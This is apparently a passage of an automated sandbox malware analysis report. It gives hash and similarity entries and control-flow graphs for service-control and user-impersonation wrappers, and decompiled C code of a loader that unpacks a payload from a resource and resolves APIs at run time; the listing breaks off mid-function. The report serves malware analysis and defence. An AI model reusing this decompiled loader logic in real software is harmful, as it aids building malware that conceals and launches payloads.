• Instruction Fuzzy Hash: 2DF1D3B0918A4D4FEB69DF28D80A7F977D1FB58311F10426EEC4EC7291DE74A5818B82
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 70ae7f8500dc03e2715057726138bed1e953225e740355331f34a9520e5be93b
• Instruction ID: b5f1104a25b7dc0ad81220b3f89939c649b7278db6364332a45adabd11bdee45
• Opcode Fuzzy Hash: 70ae7f8500dc03e2715057726138bed1e953225e740355331f34a9520e5be93b
• Instruction Fuzzy Hash: CE918070A08A4D8FEB69DF28C8597E977D1FF54310F04416EE84EC7292DE75A981CB81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenService
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3098006287-0
                                                                                                                                                                                                                                    • Opcode ID: f962d0c1bdacf0bade3e214b87019a56398ace11f7e244d69e912097a552c6ef
                                                                                                                                                                                                                                    • Instruction ID: 179620df93f24f58f826232ab9bc19939a5b25f4502add69a5a227985a404830
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f962d0c1bdacf0bade3e214b87019a56398ace11f7e244d69e912097a552c6ef
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1551C670508A4D4FEB59EF28D85A7F977D1FB59311F14412EE84EC3292DE74E8418B82
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 138 7ffbaced0b2d-7ffbaced0bb8 143 7ffbaced0bba-7ffbaced0bbf 138->143 144 7ffbaced0bc2-7ffbaced0bc7 138->144 143->144 145 7ffbaced0bc9-7ffbaced0bce 144->145 146 7ffbaced0bd1-7ffbaced0c08 OpenSCManagerW 144->146 145->146 147 7ffbaced0c0a 146->147 148 7ffbaced0c10-7ffbaced0c2d 146->148 147->148
• Summary of the node list above (rendered graph not reproduced): 7 basic blocks, 9 edges, entry 7ffbaced0b2d. OpenSCManagerW is called from block 7ffbaced0bd1-7ffbaced0c08; it returns the service control manager handle that the OpenServiceA wrapper above requires.
APIs
Memory Dump Source
• Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: dfaa01a1a40dc219666d9f0d7bbfa13cf811511bbdf73dd116c178c6bfa4281d
• Instruction ID: cdf99c6211c14e574ca93fd8c2373a4aa178e0bc6bdba18b68d3ab2deecbe064
• Opcode Fuzzy Hash: dfaa01a1a40dc219666d9f0d7bbfa13cf811511bbdf73dd116c178c6bfa4281d
• Instruction Fuzzy Hash: 8131A07190CB588FDB29DF98D8596F9BBE0EB69311F04816FD04ED3252CA70A445CB81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 149 7ffbaced1a1d-7ffbaced1a25 150 7ffbaced1a27 149->150 151 7ffbaced1a28-7ffbaced1ad9 ControlService 149->151 150->151 155 7ffbaced1ae1-7ffbaced1b09 151->155 156 7ffbaced1adb 151->156 156->155
• Summary of the node list above (rendered graph not reproduced): 5 basic blocks, 6 edges, entry 7ffbaced1a1d. ControlService is called from block 7ffbaced1a28-7ffbaced1ad9. Together with the OpenSCManagerW and OpenServiceA wrappers above, this completes the sequence for sending a control code (stop, pause, interrogate) to a named service: SCM handle, then service handle, then ControlService.
APIs
Memory Dump Source
• Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
Similarity
• API ID: ControlService
• String ID:
• API String ID: 253159669-0
• Opcode ID: 46526fecdf6471a19d1f640478a9c251d9da39fbd0951ca57292f1f5addfcb49
• Instruction ID: d6a03f1c206d50ae840314fe064a883dc5392ded1ccecd2c7b31fa13225d0854
• Opcode Fuzzy Hash: 46526fecdf6471a19d1f640478a9c251d9da39fbd0951ca57292f1f5addfcb49
• Instruction Fuzzy Hash: 0C31D57190CB588FDB18DF9CD845AF97BE0EF55321F04416EE08AD3252CB64A806CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 157 7ffbaced108a-7ffbaced10b3 158 7ffbaced10b5-7ffbaced10bd 157->158 159 7ffbaced10be-7ffbaced1152 FindCloseChangeNotification 157->159 158->159 163 7ffbaced115a-7ffbaced1181 159->163 164 7ffbaced1154 159->164 164->163
• Summary of the node list above (rendered graph not reproduced): 5 basic blocks, 6 edges, entry 7ffbaced108a. FindCloseChangeNotification is called from block 7ffbaced10be-7ffbaced1152. Tools that resolve imports by address frequently report this name in place of CloseHandle, so a wrapper this small is better read as a handle-close stub than as directory-change-notification code.
APIs
Memory Dump Source
• Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: fc51c391e89a500386ebbdbb19ec6df2dcdca8f6f93fba60c3edc62367c01404
• Instruction ID: e862793d21a49e4c8f3dacb8956e190962960af8d39182561610c13d3d078139
• Opcode Fuzzy Hash: fc51c391e89a500386ebbdbb19ec6df2dcdca8f6f93fba60c3edc62367c01404
• Instruction Fuzzy Hash: F231267090C78C8FDB0ADB6888157E97FF0EF56320F04429FD089D31A2DA65A856CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 165 7ffbaced1760-7ffbaced1767 166 7ffbaced1769-7ffbaced1771 165->166 167 7ffbaced1772-7ffbaced17c5 165->167 166->167 170 7ffbaced17cd-7ffbaced1802 ImpersonateLoggedOnUser 167->170 171 7ffbaced180a-7ffbaced1831 170->171 172 7ffbaced1804 170->172 172->171
• Summary of the node list above (rendered graph not reproduced): 6 basic blocks, 7 edges, entry 7ffbaced1760. ImpersonateLoggedOnUser is called from block 7ffbaced17cd-7ffbaced1802, so the calling thread continues under whatever token the caller obtained beforehand; the token's origin is outside this function.
APIs
Memory Dump Source
• Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
Similarity
• API ID: ImpersonateLoggedUser
• String ID:
• API String ID: 2216092060-0
• Opcode ID: dd03fd0b8cb037eef1a18dc5867e652e1c42109d6e42a7f95e36c1db9c9e515d
• Instruction ID: 028150e99ef44b6472ceb7c3ae661ac902f599a88fe041f71bb961eba0ba3889
• Opcode Fuzzy Hash: dd03fd0b8cb037eef1a18dc5867e652e1c42109d6e42a7f95e36c1db9c9e515d
• Instruction Fuzzy Hash: 7D31D47190CA4C8FDB59DFA8D845BF9BBE0EF56321F00422ED049D3192DB74A856CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 173 7ffbaced0108-7ffbaced0114 175 7ffbaced0116 173->175 176 7ffbaced012b-7ffbaced1802 ImpersonateLoggedOnUser 173->176 175->176 180 7ffbaced180a-7ffbaced1831 176->180 181 7ffbaced1804 176->181 181->180
• Summary of the node list above (rendered graph not reproduced): 5 basic blocks, 6 edges, entry 7ffbaced0108. Its second block, 7ffbaced012b-7ffbaced1802, runs into the ImpersonateLoggedOnUser wrapper above and shares that function's last two blocks (7ffbaced1804 and 7ffbaced180a-7ffbaced1831). The Similarity entry below carries no API ID.
Memory Dump Source
• Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 52e5fe74a53674f8ab9a26a52ddec63c93de3706f04596103a4feeac2888c073
• Instruction ID: baa37121740277f58f860b8da16117ad1e2d3bbab3dc7146ae4286790a8cfa4e
• Opcode Fuzzy Hash: 52e5fe74a53674f8ab9a26a52ddec63c93de3706f04596103a4feeac2888c073
• Instruction Fuzzy Hash: 2021B17190CA1C8FDB59DFA8D8497F9BBE0FB55321F00412ED04DD3152DB64A856CB51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 46 401ce2-401cea 38->46 39->40 40->25 47 401cf9-401d09 Module32Next 40->47 43 401f33-401f5d call 401560 41->43 44 401f73-401f75 42->44 45 401f6b-401f72 42->45 43->42 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->39 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 61 401d30-401d34 55->61 62 401d50-401d52 61->62 63 401d36-401d38 61->63 67 401d55-401d57 62->67 65 401d3a-401d40 63->65 66 401d4c-401d4e 63->66 65->62 69 401d42-401d4a 65->69 66->67 67->25 70 401d5d-401d7b call 401650 67->70 69->61 69->66 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 87 401d92-401d9a 82->87 83->84 84->25 85 401dad-401dbd Module32Next 84->85 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->83 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
• Summary of the node list above (rendered graph and executed/not-executed colouring not reproduced): entry 4019f0, 82 basic blocks. Windows API calls and internal calls by block, in address order:
• 4019f0-401ac7: OleInitialize, call 401650, call 40b99e
• 401acd-401c4f: GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First
• 401c55-401c6c, 401cb0-401cce, 401d10-401d2e, 401d5d-401d7b: call 401650, each followed by a short comparison loop
• 401c9c-401caf: CloseHandle, the exit block of the module walk
• 401cf9-401d09 and 401dad-401dbd: Module32Next, each branching either back into the module walk or on to 401dc3
• 401dc3-401ed4: FindCloseChangeNotification (usually a CloseHandle call under another name, see the 7ffbaced108a wrapper above), GetModuleHandleA, call 401650, FindResourceA, LoadResource, LockResource, SizeofResource, call 40b84d, call 40af66
• 401ed6-401eed: call 40ba30
• 401ef3-401f1a: call 401300, SizeofResource
• 401f33-401f5d and 401f77-401f8d: call 401560
• 401f92-4021a4: call 40ba30, FreeResource, call 40b84d, SizeofResource, call 40ac60, call 40ba30, call 401650, LoadLibraryA, call 401650, GetProcAddress
• 4021d0-402217: call 4018f0
• 402257-4022b7: call 401870, VariantInit, call 401870, VariantInit, call 4018d0
• 4022c3-40232a: call 4018d0, SafeArrayCreate, SafeArrayAccessData, call 40b350, SafeArrayUnaccessData
• 402336-402352: call 4018d0; 402354-402355: SafeArrayDestroy
• 40237d-4023a2: call 4018d0, SafeArrayCreateVector
• 4022b9-4022be, 40232c-402331, 402363-402368, 4023a4-4023a9: call 40ad90, the alternate branch after each SafeArray step
• 4023bc-402417: VariantClear (twice), call 4019a0; 40241c-40242c: VariantClear; 402436-402445: call 4019a0
• 402461-402467: call 40b6b5
• Reading: the routine 401650 is invoked before most of the API calls; the chain FindResourceA, LoadResource, LockResource, SizeofResource followed by LoadLibraryA and GetProcAddress is the shape of a loader that keeps its payload in a PE resource and resolves imports at run time, consistent with the report's unpacking and dynamically-determined-API-call signatures; the SAFEARRAY and VARIANT construction that follows builds OLE automation types from data in memory, which is how native code typically hands a byte array to a COM or hosted-CLR method, although the report records only the API names.
C-Code - Quality: 77%
E004019F0(void* __edx, void* __eflags) {
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	void* _t337;
	void* _t340;
	int _t341;
	CHAR* _t344;
	intOrPtr* _t349;
	int _t350;
	long _t352;
	signed int _t354;
	intOrPtr _t358;
	long _t359;
	CHAR* _t364;
	struct HINSTANCE__* _t365;
	CHAR* _t366;
	_Unknown_base(*)()* _t367;
	int _t368;
	int _t369;
	int _t370;
	intOrPtr* _t376;
	int _t378;
	intOrPtr _t379;
	intOrPtr* _t381;
	int _t383;
	intOrPtr* _t384;
	int _t385;
	int _t396;
	int _t399;
	int _t402;
	int _t405;
	intOrPtr* _t407;
	int _t413;
	int _t415;
	void* _t421;
	int _t422;
	int _t424;
	intOrPtr* _t428;
	intOrPtr _t429;
	intOrPtr* _t431;
	int _t432;
	int _t435;
	intOrPtr* _t437;
	int _t438;
	intOrPtr* _t439;
	int _t440;
	int _t442;
	signed int _t448;
	signed int _t451;
	signed int _t452;
	int _t469;
	int _t471;
	int _t482;
	signed int _t486;
	intOrPtr* _t488;
	intOrPtr* _t490;
	intOrPtr* _t492;
	intOrPtr _t493;
	void* _t494;
	struct HRSRC__* _t497;
	void* _t514;
	int _t519;
	intOrPtr* _t520;
	void* _t524;
	void* _t525;
	struct HINSTANCE__* _t526;
	intOrPtr _t527;
	void* _t531;
	void* _t535;
	struct HRSRC__* _t536;
	intOrPtr* _t537;
	intOrPtr* _t539;
	int _t542;
	int _t543;
	intOrPtr* _t547;
	intOrPtr* _t548;
	intOrPtr* _t549;
	intOrPtr* _t550;
	void* _t551;
	intOrPtr _t552;
	int _t555;
	void* _t556;
	void* _t557;
	void* _t558;
	void* _t559;
	void* _t560;
	void* _t561;
	void* _t562;
	intOrPtr* _t563;
	void* _t564;
	void* _t565;
	void* _t566;
	void* _t567;

	_t567 = __eflags;
	_t494 = __edx;
	__imp__OleInitialize(0); // executed
	*((char*)(_t556 + 0x18)) = 0xe0;
	*((char*)(_t556 + 0x19)) = 0x3b;
	*((char*)(_t556 + 0x1a)) = 0x8d;
	*((char*)(_t556 + 0x1b)) = 0x2a;
	*((char*)(_t556 + 0x1c)) = 0xa2;
	*((char*)(_t556 + 0x1d)) = 0x2a;
	*((char*)(_t556 + 0x1e)) = 0x2a;
	*((char*)(_t556 + 0x1f)) = 0x41;
	*((char*)(_t556 + 0x20)) = 0xd3;
	*((char*)(_t556 + 0x21)) = 0x20;
	*((char*)(_t556 + 0x22)) = 0x64;
	*((char*)(_t556 + 0x23)) = 6;
	*((char*)(_t556 + 0x24)) = 0x8a;
	*((char*)(_t556 + 0x25)) = 0xf7;
	*((char*)(_t556 + 0x26)) = 0x3d;
	*((char*)(_t556 + 0x27)) = 0x9d;
	*((char*)(_t556 + 0x28)) = 0xd9;
	*((char*)(_t556 + 0x29)) = 0xee;
	*((char*)(_t556 + 0x2a)) = 0x15;
	*((char*)(_t556 + 0x2b)) = 0x68;
	*((char*)(_t556 + 0x2c)) = 0xf4;
	*((char*)(_t556 + 0x2d)) = 0x76;
	*((char*)(_t556 + 0x2e)) = 0xb9;
	*((char*)(_t556 + 0x2f)) = 0x34;
	*((char*)(_t556 + 0x30)) = 0xbf;
	*((char*)(_t556 + 0x31)) = 0x1e;
	*((char*)(_t556 + 0x32)) = 0xe7;
	*((char*)(_t556 + 0x33)) = 0x78;
	*((char*)(_t556 + 0x34)) = 0x98;
	*((char*)(_t556 + 0x35)) = 0xe9;
	*((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                                                    				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                                                    				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                                                    				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                                                    				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                                                    				_t557 = _t556 + 0xc;
                                                                                                                                                                                                                                    				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                                                    					L80:
                                                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                                                    					_t525 = _t340;
                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                                                    					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                                                    					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                                                    					if(_t341 == 0) {
                                                                                                                                                                                                                                    						L38:
                                                                                                                                                                                                                                    						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                                                    						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                                                    						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                                                    						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                                                    						_t558 = _t557 + 8;
                                                                                                                                                                                                                                    						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                                                    						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                                                    						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                                                    						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                                                    						_push(0x40022);
                                                                                                                                                                                                                                    						_t537 = _t349; // executed
                                                                                                                                                                                                                                    						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                                                    						_t559 = _t558 + 8;
                                                                                                                                                                                                                                    						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                                                    						__eflags = _t350;
                                                                                                                                                                                                                                    						if(_t350 == 0) {
                                                                                                                                                                                                                                    							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                                                    							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                                                    							_t559 = _t559 + 0xc;
                                                                                                                                                                                                                                    							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                                                    						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                                                    						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                                                    						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                                                    						asm("cdq");
